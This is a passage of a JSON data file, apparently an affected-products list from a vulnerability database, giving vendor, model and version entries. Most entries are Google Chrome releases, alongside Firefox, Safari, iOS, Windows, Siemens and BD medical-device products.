        "version": "17.0.963.75"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.611.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.71"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.407.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.57"
      },
      {
        "_id": null,
        "model": "pyxis medstation es",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.17"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.892.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.51"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.29"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.518.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.346.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1658.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.897.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.102"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.421.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.132"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.55"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.56"
      },
      {
        "_id": null,
        "model": "pyxis stockstation system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.43"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.27"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.85"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.0"
      },
      {
        "_id": null,
        "model": "simotion p320-4s",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "36.0.1985.143"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1003.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.927.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.382.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.3"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "10.0.8"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.9"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.195.27"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.23"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "2.0.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.16"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "49.0.2623.75"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.55"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.37"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.20"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.23"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.462.0"
      },
      {
        "_id": null,
        "model": "simatic ipc827d",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.21"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1021.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "10.0.11"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.9"
      },
      {
        "_id": null,
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.77"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.16"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.49"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.818.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.08"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.13"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.37"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.64"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.645.0"
      },
      {
        "_id": null,
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.31"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.46"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.126"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.23"
      },
      {
        "_id": null,
        "model": "chrome ~~~and",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "38.0.2125.101"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1065.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.37"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.674.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.39"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.905.0"
      },
      {
        "_id": null,
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2"
      },
      {
        "_id": null,
        "model": "facssample prep assistant iii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.169"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.531.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.23"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.26"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.95"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.84"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.31"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1284.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.115"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "20.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.26"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.59"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "11"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.48"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1040.0"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.1.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.35"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.939.0"
      },
      {
        "_id": null,
        "model": "windows version for 32-bit systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "1017030"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.758.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.19"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.49"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.93"
      },
      {
        "_id": null,
        "model": "fusion",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "8.5.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.116"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.37"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.99"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.3.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.184"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.154"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.112"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.0.2"
      },
      {
        "_id": null,
        "model": "windows for 32-bit systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "100"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.48"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.42"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.8"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.0.15"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "0.0.13"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "48.0.2564.109"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.23"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.32"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.344"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "6.0.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.419.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.77"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.672.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.608.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.36"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.45"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.66"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.48"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.40"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.135"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.675.0"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "11"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.0.1"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.1.1"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.9"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.58"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.222.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.124"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.9"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.117"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.755.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1072.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.437.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.102"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.435.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.95"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.215"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "7.0.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.63"
      },
      {
        "_id": null,
        "model": "pyxis medication administration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.82"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.777.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.617.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.9"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1019.0"
      },
      {
        "_id": null,
        "model": "enterprise linux for real time",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "10.0.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.20"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.71"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.685.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.64"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.312"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.30"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.0.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.110"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.46"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.63"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.699.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.65"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.3.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.453.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.961.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.3"
      },
      {
        "_id": null,
        "model": "fusion",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "8.5.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.9"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.66"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.68"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.202"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.0.4"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.0.2"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.0.1"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "30"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.1.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.32"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.341"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.116"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.57"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1058"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "56.0.2924.76"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.28"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.70"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.20"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.14"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.408.9"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1662.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.49"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1669.3"
      },
      {
        "_id": null,
        "model": "facsverse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.52"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.18"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.506.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1054"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.132"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "17.0.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.82"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.20"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.168"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.35"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.16"
      },
      {
        "_id": null,
        "model": "kiestra tla/wca",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1286.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.41"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.703.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.668.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "31.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.41"
      },
